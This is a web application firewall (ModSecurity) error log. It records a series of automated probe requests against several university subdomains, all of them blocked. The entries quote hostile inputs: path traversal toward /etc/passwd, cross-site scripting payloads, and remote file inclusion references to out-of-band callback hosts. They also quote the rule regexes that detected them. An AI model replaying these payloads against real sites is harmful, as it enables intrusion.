[Tue Aug 29 11:55:47.667448 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAqY6JQAAAAr"]
[Tue Aug 29 11:55:47.691384 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAqeFbsAAAAx"]
[Tue Aug 29 11:55:47.768427 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAq@sZ4AAAAM"]
[Tue Aug 29 11:55:47.770818 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAAolKw4AAAAe"]
[Tue Aug 29 11:55:47.820622 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16U8Co-f0AAAq@saAAAAAM"]
[Tue Aug 29 11:55:47.832879 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16U8Co-f0AAAqY6JcAAAAr"]
[Tue Aug 29 11:55:47.862065 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16U8Co-f0AAAqqtkIAAAAA"]
[Tue Aug 29 11:55:48.539720 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAq5@GAAAAAK"]
[Tue Aug 29 11:55:48.539862 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16VMCo-f0AAAqqtkQAAAAA"]
[Tue Aug 29 11:55:48.559734 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAq4fXAAAAAJ"]
[Tue Aug 29 11:55:48.586466 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAqeFcAAAAAx"]
[Tue Aug 29 11:55:48.586737 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAq5@GIAAAAK"]
[Tue Aug 29 11:55:48.586859 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAqqtkYAAAAA"]
[Tue Aug 29 11:55:48.588710 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAqTvyoAAAAa"]
[Tue Aug 29 11:55:48.677481 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAqeFcEAAAAx"]
[Tue Aug 29 11:55:48.683253 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAq@saMAAAAM"]
[Tue Aug 29 11:55:48.700900 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAqTvywAAAAa"]
[Tue Aug 29 11:55:48.702627 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAqSw04AAAAN"]
[Tue Aug 29 11:55:48.702781 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAqY6KcAAAAr"]
[Tue Aug 29 11:55:50.093746 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16VsCo-f0AAAq@sagAAAAM"]
[Tue Aug 29 11:55:50.106460 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VsCo-f0AAAqeFcYAAAAx"]
[Tue Aug 29 11:55:51.165729 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16V8Co-f0AAAqeFc8AAAAx"]
[Tue Aug 29 11:55:51.649179 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16V8Co-f0AAAolKxgAAAAe"]
[Tue Aug 29 11:55:51.767368 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16V8Co-f0AAApbUpUAAAAh"]
[Tue Aug 29 11:55:51.940899 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16V8Co-f0AAAolKxwAAAAe"]
[Tue Aug 29 11:55:51.946809 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16V8Co-f0AAAqY6LAAAAAr"]
[Tue Aug 29 11:55:52.012913 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16WMCo-f0AAAqY6LEAAAAr"]
[Tue Aug 29 11:55:52.036875 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAAqeFdMAAAAx"]
[Tue Aug 29 11:55:52.045751 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAAolKyAAAAAe"]
[Tue Aug 29 11:55:52.052991 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAApbUpoAAAAh"]
[Tue Aug 29 11:55:52.146113 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb08o1ezecu1ng9h.oast.site found within TX:1: cjmnijtjmimvgniikdb08o1ezecu1ng9h.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAApbUp4AAAAh"]
